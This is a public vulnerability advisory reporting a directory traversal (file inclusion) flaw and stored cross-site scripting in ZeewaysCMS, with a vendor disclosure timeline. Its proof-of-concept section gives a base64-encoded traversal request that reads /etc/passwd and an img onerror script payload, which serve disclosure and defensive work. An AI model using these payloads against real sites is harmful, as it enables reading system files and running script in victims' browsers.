94 lines
No EOL
2.4 KiB
Text
94 lines
No EOL
2.4 KiB
Text
ZeewaysCMS Multiple Vulnerabilities
|
|
|
|
|
|
[Software]
|
|
|
|
- ZeewaysCMS
|
|
|
|
|
|
[Vendor Product Description]
|
|
|
|
- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates,
|
|
Individuals or any kind of Business needs.
|
|
|
|
|
|
- Site: http://www.zeewayscms.com/
|
|
|
|
|
|
[Advisory Timeline]
|
|
|
|
[25.03.2016] Vulnerability discovered.
|
|
[25.03.2016] Vendor contacted.
|
|
[29.03.2016] Follow up with the vendor.
|
|
[29.03.2016] Vendor responded asking for details.
|
|
[29.03.2016] Advisory and details sent to the vendor.
|
|
[06.04.2016] Follow up with the vendor. No response received.
|
|
[06.05.2016] Public security advisory released.
|
|
|
|
|
|
[Bug Summary]
|
|
|
|
- Directory Traversal
|
|
|
|
- Cross Site Scripting (Stored)
|
|
|
|
|
|
[Impact]
|
|
|
|
- High
|
|
|
|
|
|
[Affected Version]
|
|
|
|
- Unknown
|
|
|
|
|
|
[Tested on]
|
|
|
|
- Apache/2.2.27
|
|
- PHP/5.4.28
|
|
|
|
|
|
[Advisory]
|
|
|
|
- ID: ZSL-2016-5319
|
|
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php
|
|
|
|
|
|
[Bug Description and Proof of Concept]
|
|
|
|
- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET
|
|
parameter is not properly verified before being used to include files. This can be exploited to include files from
|
|
local resources with directory traversal attacks and URL encoded NULL bytes.
|
|
https://en.wikipedia.org/wiki/Directory_traversal_attack
|
|
|
|
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed
|
|
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to
|
|
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
|
|
https://en.wikipedia.org/wiki/Cross-site_scripting
|
|
|
|
|
|
[Proof-of-Concept]
|
|
|
|
1. Directory Traversal:
|
|
|
|
http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
|
|
Parameters: targeturl (GET)
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
2. Cross Site Scripting (Stored)
|
|
|
|
http://localhost/demo/profile
|
|
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)
|
|
|
|
Payload(s):
|
|
Content-Disposition: form-data; name="screen_name"
|
|
|
|
"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
All flaws described here were discovered and researched by:
|
|
|
|
Bikramaditya Guha aka "PhoenixX" |